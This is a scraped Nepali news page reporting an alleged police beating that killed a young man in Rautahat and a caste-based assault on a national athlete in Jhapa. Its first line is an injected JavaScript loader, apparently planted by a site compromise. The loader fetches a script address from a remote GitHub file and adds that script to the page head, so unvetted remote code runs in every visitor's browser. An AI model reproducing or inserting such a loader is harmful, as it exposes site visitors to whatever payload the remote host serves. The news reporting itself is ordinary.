;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); रौतहट घटना: ५ लाख दिएर मार्न लगाएको, प्रहरीको कुटपिटद्वारा मृत्युको आरोप: भिडियो सहित – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • रौतहट घटना: ५ लाख दिएर मार्न लगाएको, प्रहरीको कुटपिटद्वारा मृत्युको आरोप: भिडियो सहित
जुनेली बिशेष

रौतहट घटना: ५ लाख दिएर मार्न लगाएको, प्रहरीको कुटपिटद्वारा मृत्युको आरोप: भिडियो सहित

जुनेली न्युज,  रौतहट| रौतहट  जिल्ला गरुडा नगरपालिका वडा नं. ८ स्थित सच फलफुल नर्सरीमा भएको निरन्जन रामको हत्याको घटनालाई लिएर प्रहरीले अनुसन्धानका लागि भनि लगिएका सोही स्थानका अन्दाजी २० बर्षीय युवा बिजय रामको प्रहरीले जवरजस्त अपराध कबुल गराउन कुटपिट गर्दा  हत्या भएको जानकारी आएको छ |

झापा जिल्ला मेचिनगर नगरपालिका १२, चारआलीमा एथेलेटीक्सकी स्वर्ण पदक विजेता समेत रहेकी राष्ट्रीय खेलाडी चन्द्रकला लाम्गादे, उनका पति सुमन खाती र निजका घरभेटी राजन दर्जी माथी स्थानिय दुर्गा श्रेष्ठ र उनको पत्नी बिष्णु श्रेष्ठले जातिय रुपमा तथानाम गालिगलौज गर्दै मरणासन्न हुनेगरि कुटपिट गरिएको हो |

 

फेसबुक प्रतिक्रियाहरु